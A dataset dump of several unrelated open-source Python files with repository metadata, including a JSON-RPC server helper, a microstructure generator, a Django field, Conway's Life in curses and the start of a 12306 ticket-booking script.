pnt = Point(round(float(lon),2), round(float(lat),2), srid=4326)
checkdata = AfgBasinLvl4GlofasPoint.objects.filter(geom__intersects=pnt)
for z in checkdata:
p = Glofasintegrated(basin_id=z.value, datadate=date, lon=lon, lat=lat, rl2=rl2, rl5=rl5, rl20=rl20, rl2_dis_percent=max(rl2_dis_percent), rl2_avg_dis_percent=rl2_avg_dis_percent, rl5_dis_percent=max(rl5_dis_percent), rl5_avg_dis_percent=rl5_avg_dis_percent, rl20_dis_percent=max(rl20_dis_percent), rl20_avg_dis_percent=rl20_avg_dis_percent)
p.save()
print coord_index, z.value
coord_index = coord_index+1
# print data_in
# print Glofasintegrated.objects.filter(datadate=date).count()
# if Glofasintegrated.objects.filter(datadate=date).count() == 0 :
# Glofasintegrated(datadate=date).save()
nc.close()
Glofasintegrated.objects.filter(datadate='2017-04-13').delete()
calculate_glofas_params('2017-04-13')
# px = Glofasintegrated.objects.order_by().values('datadate').distinct()
# for i in px:
# print str(i['datadate'])
# Glofasintegrated.objects.filter(datadate=i['datadate']).delete()
# calculate_glofas_params(str(i['datadate']))
|
gpl-3.0
| 6,982,054,730,688,295,000
| 33.108696
| 357
| 0.605003
| false
| 2.949248
| false
| false
| false
|
deavid/bjsonrpc
|
bjsonrpc/main.py
|
1
|
2824
|
"""
bjson/main.py
Copyright (c) 2010 David Martinez Marti
All rights reserved.
Licensed under 3-clause BSD License.
See LICENSE.txt for the full license text.
"""
import socket
import bjsonrpc.server
import bjsonrpc.connection
import bjsonrpc.handlers
__all__ = [
"createserver",
"connect",
]
def createserver(host="127.0.0.1", port=10123,
handler_factory=bjsonrpc.handlers.NullHandler,
sock=None, http=False):
"""
Creates a *bjson.server.Server* object linked to a listening socket.
Parameters:
**host**
Address (IP or Host Name) to listen to as in *socket.bind*.
Use "0.0.0.0" to listen to all address. By default this points to
127.0.0.1 to avoid security flaws.
**port**
Port number to bind the socket. In Unix, port numbers less
than 1024 requires special permissions.
**handler_factory**
Class to instantiate to publish remote functions.
**(return value)**
A *bjson.server.Server* instance or raises an exception.
Servers are usually created this way::
import bjsonrpc
server = bjsonrpc.createserver("0.0.0.0")
server.serve()
Check :ref:`bjsonrpc.server` documentation
"""
if sock is None:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((host, port))
sock.listen(3)
return bjsonrpc.server.Server(sock, handler_factory=handler_factory, http=http)
def connect(host="127.0.0.1", port=10123,
sock=None, handler_factory=bjsonrpc.handlers.NullHandler):
"""
Creates a *bjson.connection.Connection* object linked to a connected
socket.
Parameters:
**host**
Address (IP or Host Name) to connect to.
**port**
Port number to connect to.
**handler_factory**
Class to instantiate to publish remote functions to the server.
By default this is *NullHandler* which means that no functions are
executable by the server.
**(return value)**
A *bjson.connection.Connection* instance or raises an exception.
Connections are usually created this way::
import bjsonrpc
conn = bjsonrpc.connect("rpc.host.net")
print conn.call.some_method_in_server_side()
"""
if sock is None:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
return bjsonrpc.connection.Connection(sock, handler_factory=handler_factory)
|
bsd-3-clause
| 5,525,710,750,083,788,000
| 29.042553
| 83
| 0.596671
| false
| 4.246617
| false
| false
| false
|
Micket/CCBuilder
|
make_cc.py
|
1
|
8680
|
#!/usr/bin/env python3
from __future__ import print_function
from __future__ import division
import argparse
import pickle
import time
import CCBuilder as ccb
import CCBuilder_c as ccb_c
import numpy as np
import scipy.special
def uniform_dist(x):
""" Returns uniform distributions of given range """
return lambda: np.random.uniform(x[0], x[1])
def weibull_dist(a, mu):
""" Returns Weibull distributions for given shape parameter and average """
return lambda: np.random.weibull(a) * mu / scipy.special.gamma(1/a + 1)
def parse_dist(arg):
# Parses input string for given distribution.
# Returns a distribution, and the average
d, params = arg.split(':')
params = [float(x) for x in params.split(',')]
if d == 'U':
return uniform_dist(params), np.mean(params)
elif d == 'W':
a, mu = params
return weibull_dist(a, mu), mu
parser = argparse.ArgumentParser(description='''Generate a WC microstructure.
Grain shape/size supports 2 types of distributions:
Uniform: U:low,high
Weibull: U:a,mu (a=k in some notation, mu=mean)
''',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# parser.add_argument('-V', dest='verbose', action='store_true', help='Verbose mode.')
parser.add_argument('-f', dest='fname', metavar='basename', required=True, help='Output base filename.')
parser.add_argument('-L', dest='L', metavar='length', required=True, type=float, help='Cell length (volume is L^3)')
parser.add_argument('-m', dest='m', metavar='m', required=True, type=int,
help='Grid resolution. Total number of voxels are (m*L)^3')
parser.add_argument('--vol_frac_goal', dest="vol_frac_goal", metavar='v', required=True, type=float,
help='Goal for volume fraction WC (excluding overlap)')
parser.add_argument('-s', dest='seed', metavar='s', default=None, type=int,
help='Seed for RNG. Given identical parameters, ' +
'CCBuilder will generate identical output given a controlled seed.')
parser.add_argument('--stray_cleanup', action='store_true', help='Clean up stray voxels')
group = parser.add_argument_group('WC grain shape')
group.add_argument('-k', dest='k_dist', metavar='type,[params]', default='U:0.4,1.4',
help='k distribution')
group.add_argument('-r', dest='r_dist', metavar='type,[params]', default='U:0.1,0.4',
help='r distribution')
group.add_argument('-d', dest='d_dist', metavar='type,[params]', default='U:0.5,1.5',
help='d distribution')
group = parser.add_argument_group('Packing')
group.add_argument('--use_potential', action='store_true', help='Use repulsive potential.')
group.add_argument('--nr_tries', dest='nr_tries', metavar='n', default=2500, type=int,
help='Number of random translations.')
group.add_argument('--delta', dest='delta', metavar='d', type=float,
help='Maximum distance for randomized translations.')
group.add_argument('--m_coarse', dest="m_coarse", metavar='mc', default=10,
help='Grid resolution during packing.')
group = parser.add_argument_group('Potts simulation')
group.add_argument('--mc_steps', dest="mc_steps", metavar='steps', default=0.05, type=float,
help='Monte-Carlo steps (scales with (m*L)^4. Set to zero to turn off.')
group.add_argument('--tau', dest='tau', metavar='t', default=0.5, type=float,
help='Ficticious temperature in Potts model.')
options = parser.parse_args()
if options.seed is not None:
np.random.seed(options.seed)
# Heuristic mapping from actual to goal volume fraction
# vol_frac_goal = (alpha - 2)/(2 * alpha) + 1/alpha * np.sqrt(1 - alpha * np.log(-2*(vol_frac - 1)))
d_eq, d_0 = parse_dist(options.d_dist)
r, r_0 = parse_dist(options.r_dist)
k, k_0 = parse_dist(options.k_dist)
fname = options.fname
# to avoid confusion with types:
m = np.int(options.m)
m_coarse = np.int(options.m_coarse)
L = np.float(options.L)
mc_steps = np.float(options.mc_steps)
vol_frac_goal = np.double(options.vol_frac_goal)
tau = np.double(options.tau)
nr_tries = np.int(options.nr_tries)
delta_x = d_0/float(m)
M = np.int(m * L / d_0)
M_coarse = np.int(m_coarse * L / d_0)
idelta = M
idelta_coarse = M_coarse
if options.delta:
idelta = np.int(M * options.delta / L)
idelta_coarse = np.int(M_coarse * options.delta / L)
trunc_triangles = ccb.prepare_triangles(vol_frac_goal, L, r, k, d_eq)
# trunc_triangles = trunc_triangles[:1]
# trunc_triangles[0].rot_matrix = np.eye(3)
# trunc_triangles[0].rot_matrix_tr = np.eye(3)
# trunc_triangles[0].midpoint = np.array([2., 2., 2.])
# Sort triangles w.r.t. volume, so that large triangles are added to the box first (better packing)
trunc_triangles.sort(key=lambda x: x.volume, reverse=True)
print('Prepared', len(trunc_triangles), 'triangles')
if options.use_potential:
ccb.optimize_midpoints(L, trunc_triangles)
if m_coarse == m:
grain_ids, overlaps, voxel_indices = ccb_c.populate_voxels(M, L, trunc_triangles, nr_tries, idelta, 1.0)
else:
if nr_tries > 0:
# Optimization: Use coarser grid for packing, then insert packed grains into fine grid
# No need to get the return values, trunc_triangles
ccb_c.populate_voxels(M_coarse, L, trunc_triangles, nr_tries, idelta_coarse, 1.0)
grain_ids, overlaps, voxel_indices = ccb_c.populate_voxels(M, L, trunc_triangles, 1, 0, 1.0)
if mc_steps > 0:
start_time = time.time()
# Do Potts on coarse grid first for an improved initial guess.
M_coarseMC = M//2
grain_ids_coarse, overlaps_coarse, voxel_indices_coarse = ccb_c.populate_voxels(M_coarseMC, L, trunc_triangles, 0, 0, 1.0)
_, gb_voxels_coarse, _ = ccb_c.calc_surface_prop(M_coarseMC, grain_ids_coarse)
ccb_c.make_mcp_bound(M_coarseMC, grain_ids_coarse, gb_voxels_coarse, overlaps_coarse, voxel_indices_coarse,
np.int(mc_steps * M_coarseMC**4), tau)
# Copy over that solution to the overlap regions of the fine grid as a starting point
M2 = M**2
i = np.nonzero(overlaps)[0]
iz = i // M2
iy = (i - iz*M2) // M
ix = i - iz*M2 - iy*M
cix = ix * M_coarseMC // M
ciy = iy * M_coarseMC // M
ciz = iz * M_coarseMC // M
ci = cix + ciy*M_coarseMC + ciz*M_coarseMC**2
gid = grain_ids_coarse[ci]
# Could use a Cython implementation for efficiency.
for ii, g in zip(i, gid):
if g != grain_ids[ii] and np.searchsorted(voxel_indices[g-2], ii) < len(voxel_indices[g-2]):
grain_ids[ii] = g
# This might change a few voxels to a value that they shouldn't obtain, but it's barely noticeable
# grain_ids_1[i] = grain_ids_coarse[ci]
_, gb_voxels, _ = ccb_c.calc_surface_prop(M, grain_ids)
# and run the full resolution MCP:
ccb_c.make_mcp_bound(M, grain_ids, gb_voxels, overlaps, voxel_indices, np.int(mc_steps * M ** 4), tau)
print('Potts model took {} seconds'.format(np.str(time.time() - start_time)))
if options.stray_cleanup:
start_time = time.time()
ccb_c.stray_cleanup(M, grain_ids)
print('Stray voxel cleanup took {} seconds'.format(np.str(time.time() - start_time)))
surface_voxels, gb_voxels, interface_voxels = ccb_c.calc_surface_prop(M, grain_ids)
phases, good_voxels, euler_angles = ccb_c.calc_grain_prop(M, grain_ids, trunc_triangles)
phase_volumes = np.bincount(phases)
vol_frac_WC = phase_volumes[2] / np.float(M ** 3)
vol_frac_Co = 1 - vol_frac_WC
mass_frac_WC = ccb.mass_fraction(vol_frac_WC)
sum_gb_voxels = np.sum(gb_voxels)
contiguity = sum_gb_voxels / np.float(sum_gb_voxels + np.sum(interface_voxels))
print('Contiguity {:5f}, Co volume frac {:.5f}, mass frac {:.5f}'.format(
contiguity, 1 - vol_frac_WC, ccb.mass_fraction(vol_frac_WC)))
ccb.write_dream3d(fname, 3 * [M], 3 * [delta_x], trunc_triangles, grain_ids, phases, good_voxels,
euler_angles, surface_voxels, gb_voxels, interface_voxels, overlaps)
with open(fname + '_trunc_triangles.data', 'wb') as f:
pickle.dump([t.rot_matrix for t in trunc_triangles], f)
# Saving grain volume data
if False:
grain_volumes = np.bincount(grain_ids)
d_eq = ccb.volume_to_eq_d(grain_volumes[2:] * delta_x ** 3)
# np.savetxt(fname + '_d_orig.txt', [t.d_eq for t in trunc_triangles])
np.savetxt(fname + '_d.txt', d_eq)
# Plot initial and final distributions
import matplotlib.pyplot as plt
plt.hist(np.array([t.d_eq for t in trunc_triangles]), alpha=0.5, bins=15, normed=True, label='Initial')
plt.hist(d_eq, alpha=0.5, bins=15, normed=True, label='Final')
plt.legend(loc='upper right')
plt.show()
|
gpl-3.0
| -3,357,573,291,557,032,400
| 41.54902
| 126
| 0.65818
| false
| 2.923543
| false
| false
| false
|
lyoniionly/django-cobra
|
src/cobra/models/fields/node.py
|
1
|
3306
|
from __future__ import absolute_import, print_function
import collections
import logging
import six
import warnings
from django.db import models
from django.db.models.signals import post_delete
from cobra.core.cache import memoize
from cobra.core.compat import pickle
from cobra.core.strings import decompress, compress
from .gzippeddict import GzippedDictField
try:
from south.modelsinspector import add_introspection_rules
except ImportError:
pass
else:
add_introspection_rules([], ["^cobra\.models\.fields\.node\.NodeField"])
__all__ = ('NodeField',)
logger = logging.getLogger('cobra.errors')
class NodeData(collections.MutableMapping):
def __init__(self, id, data=None):
self.id = id
self._node_data = data
def __getitem__(self, key):
return self.data[key]
def __setitem__(self, key, value):
self.data[key] = value
def __delitem__(self, key):
del self.data[key]
def __iter__(self):
return iter(self.data)
def __len__(self):
return len(self.data)
def __repr__(self):
cls_name = type(self).__name__
if self._node_data:
return '<%s: id=%s data=%r>' % (
cls_name, self.id, repr(self._node_data))
return '<%s: id=%s>' % (cls_name, self.id,)
@memoize
def data(self):
from cobra import singleton
if self._node_data is not None:
return self._node_data
elif self.id:
warnings.warn('You should populate node data before accessing it.')
return singleton.nodestore.get(self.id) or {}
return {}
def bind_data(self, data):
self._node_data = data
class NodeField(GzippedDictField):
"""
Similar to the gzippedictfield except that it stores a reference
to an external node.
"""
def contribute_to_class(self, cls, name):
super(NodeField, self).contribute_to_class(cls, name)
post_delete.connect(
self.on_delete,
sender=self.model,
weak=False)
def on_delete(self, instance, **kwargs):
from cobra import singleton
value = getattr(instance, self.name)
if not value.id:
return
singleton.nodestore.delete(value.id)
def to_python(self, value):
if isinstance(value, six.string_types) and value:
try:
value = pickle.loads(decompress(value))
except Exception as e:
logger.exception(e)
value = {}
elif not value:
value = {}
if 'node_id' in value:
node_id = value.pop('node_id')
data = None
else:
node_id = None
data = value
return NodeData(node_id, data)
def get_prep_value(self, value):
from cobra import singleton
if not value and self.null:
# save ourselves some storage
return None
# TODO(dcramer): we should probably do this more intelligently
# and manually
if not value.id:
value.id = singleton.nodestore.create(value.data)
else:
singleton.nodestore.set(value.id, value.data)
return compress(pickle.dumps({
'node_id': value.id
}))
|
apache-2.0
| 8,760,018,005,294,236,000
| 24.635659
| 79
| 0.588627
| false
| 3.987937
| false
| false
| false
|
andersgs/dingo
|
dingo/random_forest.py
|
1
|
2551
|
'''
Some functions to fit a random forest
'''
import sklearn.ensemble
import pandas
import progressbar
bar = progressbar.ProgressBar()
def test_max_features(max_features):
if (max_features not in ['sqrt', 'auto', 'log2', None]):
try:
max_features = int(max_features)
except ValueError:
print("max_features has to be an integer or one of 'sqrt', 'auto', 'log2' or None.")
raise
return max_features
def learn(X,y, n_trees = 10, criterion = 'entropy', max_features = "sqrt", max_depth = None, min_samples_split = 2, min_samples_leaf = 1, min_weight_fraction_leaf = 0, max_leaf_nodes = None, min_impurity_split = 1e-7, bootstrap = False, oob_score = False, n_jobs = 10, random_state = None, warm_start = False, class_weight = 'balanced_subsample'):
rf = sklearn.ensemble.RandomForestClassifier(n_estimators = n_trees, \
criterion = criterion, \
max_features = max_features, \
max_depth = max_depth, \
min_samples_split = min_samples_split, \
min_samples_leaf = min_samples_leaf, \
min_weight_fraction_leaf = min_weight_fraction_leaf, \
max_leaf_nodes = max_leaf_nodes, \
min_impurity_split = min_impurity_split, \
bootstrap = bootstrap, \
oob_score = oob_score, \
n_jobs = n_jobs, \
random_state = random_state, \
warm_start = warm_start, \
class_weight = class_weight, \
verbose = 1
)
rf.fit(X, y)
return rf
def importance(rf, kmers):
importance = rf.estimators_[0].feature_importances_
for est in bar(rf.estimators_[1:]):
importance += est.feature_importances_
importance = importance/rf.n_estimators
d = {"kmer": kmers,
"importance": importance}
d = pandas.DataFrame(d)
d = d.sort_values(by = "importance", ascending = 0)
d = d.loc[d.importance > 0]
return d
|
bsd-3-clause
| -2,556,278,225,202,661,400
| 49.019608
| 347
| 0.46374
| false
| 4.555357
| false
| false
| false
|
Orav/kbengine
|
kbe/src/lib/python/Tools/demo/life.py
|
1
|
9249
|
#!/usr/bin/env python3
"""
A curses-based version of Conway's Game of Life.
An empty board will be displayed, and the following commands are available:
E : Erase the board
R : Fill the board randomly
S : Step for a single generation
C : Update continuously until a key is struck
Q : Quit
Cursor keys : Move the cursor around the board
Space or Enter : Toggle the contents of the cursor's position
Contributed by Andrew Kuchling, Mouse support and color by Dafydd Crosby.
"""
import curses
import random
class LifeBoard:
"""Encapsulates a Life board
Attributes:
X,Y : horizontal and vertical size of the board
state : dictionary mapping (x,y) to 0 or 1
Methods:
display(update_board) -- If update_board is true, compute the
next generation. Then display the state
of the board and refresh the screen.
erase() -- clear the entire board
make_random() -- fill the board randomly
set(y,x) -- set the given cell to Live; doesn't refresh the screen
toggle(y,x) -- change the given cell from live to dead, or vice
versa, and refresh the screen display
"""
def __init__(self, scr, char=ord('*')):
"""Create a new LifeBoard instance.
scr -- curses screen object to use for display
char -- character used to render live cells (default: '*')
"""
self.state = {}
self.scr = scr
Y, X = self.scr.getmaxyx()
self.X, self.Y = X - 2, Y - 2 - 1
self.char = char
self.scr.clear()
# Draw a border around the board
border_line = '+' + (self.X * '-') + '+'
self.scr.addstr(0, 0, border_line)
self.scr.addstr(self.Y + 1, 0, border_line)
for y in range(0, self.Y):
self.scr.addstr(1 + y, 0, '|')
self.scr.addstr(1 + y, self.X + 1, '|')
self.scr.refresh()
def set(self, y, x):
"""Set a cell to the live state"""
if x < 0 or self.X <= x or y < 0 or self.Y <= y:
raise ValueError("Coordinates out of range %i,%i" % (y, x))
self.state[x, y] = 1
def toggle(self, y, x):
"""Toggle a cell's state between live and dead"""
if x < 0 or self.X <= x or y < 0 or self.Y <= y:
raise ValueError("Coordinates out of range %i,%i" % (y, x))
if (x, y) in self.state:
del self.state[x, y]
self.scr.addch(y + 1, x + 1, ' ')
else:
self.state[x, y] = 1
if curses.has_colors():
# Let's pick a random color!
self.scr.attrset(curses.color_pair(random.randrange(1, 7)))
self.scr.addch(y + 1, x + 1, self.char)
self.scr.attrset(0)
self.scr.refresh()
def erase(self):
"""Clear the entire board and update the board display"""
self.state = {}
self.display(update_board=False)
def display(self, update_board=True):
"""Display the whole board, optionally computing one generation"""
M, N = self.X, self.Y
if not update_board:
for i in range(0, M):
for j in range(0, N):
if (i, j) in self.state:
self.scr.addch(j + 1, i + 1, self.char)
else:
self.scr.addch(j + 1, i + 1, ' ')
self.scr.refresh()
return
d = {}
self.boring = 1
for i in range(0, M):
L = range(max(0, i - 1), min(M, i + 2))
for j in range(0, N):
s = 0
live = (i, j) in self.state
for k in range(max(0, j - 1), min(N, j + 2)):
for l in L:
if (l, k) in self.state:
s += 1
s -= live
if s == 3:
# Birth
d[i, j] = 1
if curses.has_colors():
# Let's pick a random color!
self.scr.attrset(curses.color_pair(
random.randrange(1, 7)))
self.scr.addch(j + 1, i + 1, self.char)
self.scr.attrset(0)
if not live:
self.boring = 0
elif s == 2 and live:
# Survival
d[i, j] = 1
elif live:
# Death
self.scr.addch(j + 1, i + 1, ' ')
self.boring = 0
self.state = d
self.scr.refresh()
def make_random(self):
"Fill the board with a random pattern"
self.state = {}
for i in range(0, self.X):
for j in range(0, self.Y):
if random.random() > 0.5:
self.set(j, i)
def erase_menu(stdscr, menu_y):
"Clear the space where the menu resides"
stdscr.move(menu_y, 0)
stdscr.clrtoeol()
stdscr.move(menu_y + 1, 0)
stdscr.clrtoeol()
def display_menu(stdscr, menu_y):
"Display the menu of possible keystroke commands"
erase_menu(stdscr, menu_y)
# If color, then light the menu up :-)
if curses.has_colors():
stdscr.attrset(curses.color_pair(1))
stdscr.addstr(menu_y, 4,
'Use the cursor keys to move, and space or Enter to toggle a cell.')
stdscr.addstr(menu_y + 1, 4,
'E)rase the board, R)andom fill, S)tep once or C)ontinuously, Q)uit')
stdscr.attrset(0)
def keyloop(stdscr):
# Clear the screen and display the menu of keys
stdscr.clear()
stdscr_y, stdscr_x = stdscr.getmaxyx()
menu_y = (stdscr_y - 3) - 1
display_menu(stdscr, menu_y)
# If color, then initialize the color pairs
if curses.has_colors():
curses.init_pair(1, curses.COLOR_BLUE, 0)
curses.init_pair(2, curses.COLOR_CYAN, 0)
curses.init_pair(3, curses.COLOR_GREEN, 0)
curses.init_pair(4, curses.COLOR_MAGENTA, 0)
curses.init_pair(5, curses.COLOR_RED, 0)
curses.init_pair(6, curses.COLOR_YELLOW, 0)
curses.init_pair(7, curses.COLOR_WHITE, 0)
# Set up the mask to listen for mouse events
curses.mousemask(curses.BUTTON1_CLICKED)
# Allocate a subwindow for the Life board and create the board object
subwin = stdscr.subwin(stdscr_y - 3, stdscr_x, 0, 0)
board = LifeBoard(subwin, char=ord('*'))
board.display(update_board=False)
# xpos, ypos are the cursor's position
xpos, ypos = board.X // 2, board.Y // 2
# Main loop:
while True:
stdscr.move(1 + ypos, 1 + xpos) # Move the cursor
c = stdscr.getch() # Get a keystroke
if 0 < c < 256:
c = chr(c)
if c in ' \n':
board.toggle(ypos, xpos)
elif c in 'Cc':
erase_menu(stdscr, menu_y)
stdscr.addstr(menu_y, 6, ' Hit any key to stop continuously '
'updating the screen.')
stdscr.refresh()
# Activate nodelay mode; getch() will return -1
# if no keystroke is available, instead of waiting.
stdscr.nodelay(1)
while True:
c = stdscr.getch()
if c != -1:
break
stdscr.addstr(0, 0, '/')
stdscr.refresh()
board.display()
stdscr.addstr(0, 0, '+')
stdscr.refresh()
stdscr.nodelay(0) # Disable nodelay mode
display_menu(stdscr, menu_y)
elif c in 'Ee':
board.erase()
elif c in 'Qq':
break
elif c in 'Rr':
board.make_random()
board.display(update_board=False)
elif c in 'Ss':
board.display()
else:
# Ignore incorrect keys
pass
elif c == curses.KEY_UP and ypos > 0:
ypos -= 1
elif c == curses.KEY_DOWN and ypos + 1 < board.Y:
ypos += 1
elif c == curses.KEY_LEFT and xpos > 0:
xpos -= 1
elif c == curses.KEY_RIGHT and xpos + 1 < board.X:
xpos += 1
elif c == curses.KEY_MOUSE:
mouse_id, mouse_x, mouse_y, mouse_z, button_state = curses.getmouse()
if (mouse_x > 0 and mouse_x < board.X + 1 and
mouse_y > 0 and mouse_y < board.Y + 1):
xpos = mouse_x - 1
ypos = mouse_y - 1
board.toggle(ypos, xpos)
else:
# They've clicked outside the board
curses.flash()
else:
# Ignore incorrect keys
pass
def main(stdscr):
keyloop(stdscr) # Enter the main loop
if __name__ == '__main__':
curses.wrapper(main)
|
lgpl-3.0
| -7,308,566,763,295,885,000
| 33.301527
| 81
| 0.484917
| false
| 3.782822
| false
| false
| false
|
jwilliamn/handwritten
|
extraction/FormatModel/CreatePage3Variable.py
|
1
|
6106
|
import pickle
from extraction.FormatModel.VariableDefinitions import *
from extraction.FormatModel.RawVariableDefinitions import *
import json
def jsonDefault(object):
return object.__dict__
if __name__ == '__main__':
Page3 = Category('page3', 'pagina 3')
############
for r in range(1,6):
str_r = str(r)
if len(str_r) == 1:
str_r = '0'+str_r
P = Category('P'+str_r,'Persona '+str_r)
ap_paterno=Category('apellido_paterno','Apellido paterno')
variable_ap_paterno=Variable('pos_TL_BR','posicion final', None)
ap_paterno.addSubType(variable_ap_paterno)
ap_materno = Category('apellido_materno', 'Apellido materno')
variable_ap_materno = Variable('pos_TL_BR', 'posicion final', None)
ap_materno.addSubType(variable_ap_materno)
nombres = Category('nombres', 'nombres')
variable_nombres = Variable('pos_TL_BR', 'posicion final', None)
nombres.addSubType(variable_nombres)
fecha_nacimiento = Category('fecha_nacimiento', 'Fecha de nacimiento')
variable_fecha_nacimiento = Variable('pos_TL_BR', 'posicion final', None)
fecha_nacimiento.addSubType(variable_fecha_nacimiento)
edad_anhos = Category('edad_anhos', 'edad_anios')
variable_edad_anhos = Variable('pos_TL_BR', 'posicion final', None)
edad_anhos.addSubType(variable_edad_anhos)
edad_meses = Category('edad_meses', 'edad_meses')
variable_edad_meses = Variable('pos_TL_BR', 'posicion final', None)
edad_meses.addSubType(variable_edad_meses)
tipo_documento = Category('tipo_documento', 'tipo_documento')
variable_tipo_documento = Variable('pos_TL_BR', 'posicion final', None)
tipo_documento.addSubType(variable_tipo_documento)
numero_documento = Category('numero_documento', 'numero_documento')
variable_numero_documento = Variable('pos_TL_BR', 'posicion final', None)
numero_documento.addSubType(variable_numero_documento)
parentesco_jefe_hogar = Category('parentesco_jefe_hogar', 'parentesco_jefe_hogar')
variable_parentesco_jefe_hogar = Variable('pos_TL_BR', 'posicion final', None)
parentesco_jefe_hogar.addSubType(variable_parentesco_jefe_hogar)
num_nucleo_familiar = Category('num_nucleo_familiar', 'num_nucleo_familiar')
variable_num_nucleo_familiar = Variable('pos_TL_BR', 'posicion final', None)
num_nucleo_familiar.addSubType(variable_num_nucleo_familiar)
sexo = Category('sexo', 'sexo')
variable_sexo = Variable('pos_TL_BR', 'posicion final', None)
sexo.addSubType(variable_sexo)
estado_civil = Category('estado_civil', 'estado_civil')
variable_estado_civil = Variable('pos_TL_BR', 'posicion final', None)
estado_civil.addSubType(variable_estado_civil)
tipo_seguro = Category('tipo_seguro', 'tipo_seguro')
variable_tipo_seguro = Variable('pos_TL_BR', 'posicion final', None)
tipo_seguro.addSubType(variable_tipo_seguro)
lengua_materna = Category('lengua_materna', 'lengua_materna')
variable_lengua_materna = Variable('pos_TL_BR', 'posicion final', None)
lengua_materna.addSubType(variable_lengua_materna)
sabe_leer_escribir = Category('sabe_leer_escribir', 'sabe_leer_escribir')
variable_sabe_leer_escribir = Variable('pos_TL_BR', 'posicion final', None)
sabe_leer_escribir.addSubType(variable_sabe_leer_escribir)
nivel_educativo = Category('nivel_educativo', 'nivel_educativo')
variable_nivel_educativo = Variable('pos_TL_BR', 'posicion final', None)
nivel_educativo.addSubType(variable_nivel_educativo)
ultimo_grado_aprobado = Category('ultimo_grado_aprobado', 'ultimo_grado_aprobado')
variable_ultimo_grado_aprobado = Variable('pos_TL_BR', 'posicion final', None)
ultimo_grado_aprobado.addSubType(variable_ultimo_grado_aprobado)
ultimo_mes_era_un = Category('ultimo_mes_era_un', 'ultimo_mes_era_un')
variable_ultimo_mes_era_un = Variable('pos_TL_BR', 'posicion final', None)
ultimo_mes_era_un.addSubType(variable_ultimo_mes_era_un)
sector_desempenho = Category('sector_desempenho', 'sector_desempenho')
variable_sector_desempenho = Variable('pos_TL_BR', 'posicion final', None)
sector_desempenho.addSubType(variable_sector_desempenho)
presenta_discapacidad = Category('presenta_discapacidad', 'presenta_discapacidad')
variable_presenta_discapacidad = Variable('pos_TL_BR', 'posicion final', None)
presenta_discapacidad.addSubType(variable_presenta_discapacidad)
programa_social_beneficiario = Category('programa_social_beneficiario', 'programa_social_beneficiario')
variable_programa_social_beneficiario = Variable('pos_TL_BR', 'posicion final', None)
programa_social_beneficiario.addSubType(variable_programa_social_beneficiario)
#############
P.addSubType(ap_paterno)
P.addSubType(ap_materno)
P.addSubType(nombres)
P.addSubType(fecha_nacimiento)
P.addSubType(edad_anhos)
P.addSubType(edad_meses)
P.addSubType(tipo_documento)
P.addSubType(numero_documento)
P.addSubType(parentesco_jefe_hogar)
P.addSubType(num_nucleo_familiar)
P.addSubType(sexo)
P.addSubType(estado_civil)
P.addSubType(tipo_seguro)
P.addSubType(lengua_materna)
P.addSubType(sabe_leer_escribir)
P.addSubType(nivel_educativo)
P.addSubType(ultimo_grado_aprobado)
P.addSubType(ultimo_mes_era_un)
P.addSubType(sector_desempenho)
P.addSubType(presenta_discapacidad)
P.addSubType(programa_social_beneficiario)
Page3.addSubType(P)
with open('pagina3.json', 'w') as output:
json.dump(Page3, output, default=jsonDefault, indent=4)
Page3.describe(True)
|
gpl-3.0
| 2,086,762,254,357,249,800
| 44.237037
| 111
| 0.655748
| false
| 2.909004
| false
| false
| false
|
huzhifeng/py12306
|
py12306.py
|
1
|
62739
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# 标准库
import argparse
import urllib
import time
import datetime
import sys
import re
import ConfigParser
import random
import smtplib
from email.mime.text import MIMEText
# 第三方库
import requests
from huzhifeng import dumpObj, hasKeys
# Set default encoding to utf-8
reload(sys)
sys.setdefaultencoding('utf-8')
requests.packages.urllib3.disable_warnings()
# 全局变量
RET_OK = 0
RET_ERR = -1
MAX_TRIES = 3
MAX_DAYS = 60
stations = []
seatMaps = [
('1', u'硬座'), # 硬座/无座
('3', u'硬卧'),
('4', u'软卧'),
('7', u'一等软座'),
('8', u'二等软座'),
('9', u'商务座'),
('M', u'一等座'),
('O', u'二等座'),
('B', u'混编硬座'),
('P', u'特等座')
]
# 全局函数
def printDelimiter():
print('-' * 64)
def getTime():
return time.strftime('%Y-%m-%d %X', time.localtime()) # 2014-01-01 12:00:00
def date2UTC(d):
# Convert '2014-01-01' to 'Wed Jan 01 00:00:00 UTC+0800 2014'
t = time.strptime(d, '%Y-%m-%d')
asc = time.asctime(t) # 'Wed Jan 01 00:00:00 2014'
# 'Wed Jan 01 00:00:00 UTC+0800 2014'
return (asc[0:-4] + 'UTC+0800 ' + asc[-4:])
def getCardType(key):
d = {
'1': u'二代身份证',
'2': u'一代身份证',
'C': u'港澳通行证',
'G': u'台湾通行证',
'B': u'护照'
}
return d[key] if key in d else u'未知证件类型'
def getTicketType(key):
d = {
'1': u'成人票',
'2': u'儿童票',
'3': u'学生票',
'4': u'残军票'
}
return d[key] if key in d else u'未知票种'
def getSeatType(key):
d = dict(seatMaps)
return d[key] if key in d else u'未知席别'
def selectSeatType():
key = '1' # 默认硬座
while True:
print(u'请选择席别编码(即左边第一个英文字母):')
for xb in seatMaps:
print(u'%s: %s' % (xb[0], xb[1]))
key = raw_input().upper()
d = dict(seatMaps)
if key in d:
return key
else:
print(u'无效的席别类型!')
def checkDate(date):
m = re.match(r'^\d{4}-\d{2}-\d{2}$', date) # 2014-01-01
if m:
today = datetime.datetime.now()
fmt = '%Y-%m-%d'
today = datetime.datetime.strptime(today.strftime(fmt), fmt)
train_date = datetime.datetime.strptime(m.group(0), fmt)
delta = train_date - today
if delta.days < 0:
print(u'乘车日期%s无效, 只能预订%s以后的车票' % (
train_date.strftime(fmt),
today.strftime(fmt)))
return False
else:
return True
else:
return False
def selectDate():
fmt = '%Y-%m-%d'
week_days = [u'星期一', u'星期二', u'星期三', u'星期四', u'星期五', u'星期六', u'星期天']
now = datetime.datetime.now()
available_date = [(now + datetime.timedelta(days=i)) for i in xrange(MAX_DAYS)]
for i in xrange(0, MAX_DAYS, 2):
print(u'第%2d天: %s(%s)' % (
i + 1, available_date[i].strftime(fmt), week_days[available_date[i].weekday()])),
if i + 1 < MAX_DAYS:
print(u'\t\t第%2d天: %s(%s)' % (
